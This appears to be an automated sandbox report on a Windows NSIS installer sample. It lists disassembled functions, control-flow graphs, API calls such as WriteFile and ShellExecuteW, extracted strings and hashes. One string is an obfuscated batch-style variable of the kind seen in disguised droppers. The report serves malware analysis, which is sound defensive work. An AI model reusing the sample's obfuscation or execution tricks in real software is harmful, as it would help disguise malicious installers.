                                                                                                                                    • Error launching installer, xrefs: 004035D7
                                                                                                                                    • soft, xrefs: 00403675
                                                                                                                                    • Null, xrefs: 0040367E
                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                                                    • Inst, xrefs: 0040366C
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                    • API String ID: 4283519449-527102705
                                                                                                                                    • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                    • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                                                    • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                    • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                                                                                    Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403464
                                                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                                                    • wsprintfW.USER32 ref: 004034A4
                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                                                    • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                                                    Strings
                                                                                                                                    • X1C, xrefs: 0040343C
                                                                                                                                    • X1C, xrefs: 004033ED
                                                                                                                                    • Set Syria=eAuDoJunction-Brokers-Accepts-Tone-Soc-Mostly-Effect-DxXxCurrently-Barrier-Serving-Pen-Temp-Worry-Adopt-HTJoy-Keeps-Formatting-BHPCalculators-Mall-South-Rear-Calendar-Gratis-Conditions-Regions-Anniversary-XkAttraction-Stick-Facility-Soc-S, xrefs: 004033A9
                                                                                                                                    • ... %d%%, xrefs: 0040349E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                                                                    • String ID: ... %d%%$Set Syria=eAuDoJunction-Brokers-Accepts-Tone-Soc-Mostly-Effect-DxXxCurrently-Barrier-Serving-Pen-Temp-Worry-Adopt-HTJoy-Keeps-Formatting-BHPCalculators-Mall-South-Rear-Calendar-Gratis-Conditions-Regions-Anniversary-XkAttraction-Stick-Facility-Soc-S$X1C$X1C
                                                                                                                                    • API String ID: 651206458-3429726488
                                                                                                                                    • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                    • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                                                    • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                    • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                                                                                    Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                    • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                    • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                    • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2740478559-0
                                                                                                                                    • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                                                    • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                                                    • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                                                                                    • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                                                                                    Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                    • GlobalFree.KERNELBASE(005A15B8), ref: 00402387
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeGloballstrcpyn
                                                                                                                                    • String ID: 134$Exch: stack < %d elements$Pop: stack empty
                                                                                                                                    • API String ID: 1459762280-2989431295
                                                                                                                                    • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                                                                                    • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                                                    • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                                                                                    • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                                                                                    Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                                                                                                                    APIs
                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                    • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                    • GlobalFree.KERNELBASE(005A15B8), ref: 00402387
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3376005127-0
                                                                                                                                    • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                    • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                                                    • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                                                    • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                                                                                    Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2568930968-0
                                                                                                                                    • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                    • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                                                    • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                                                    • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                                                                                    Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                    • String ID: 134$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                    • API String ID: 247603264-3670937170
                                                                                                                                    • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                    • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                                                    • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                                                    • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                                                                                    Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                    Strings
                                                                                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                    • API String ID: 3156913733-2180253247
                                                                                                                                    • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                    • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                                                    • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                    • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                                                    Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                    • String ID: nsa
                                                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                                                    • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                    • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                                                    • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                    • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                                                    Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2107068898.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2107048860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107130191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107184321.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2107287418.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_hlyG1m5UmO.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                    • String ID: HideWindow
                                                                                                                                    • API String ID: 1249568736-780306582
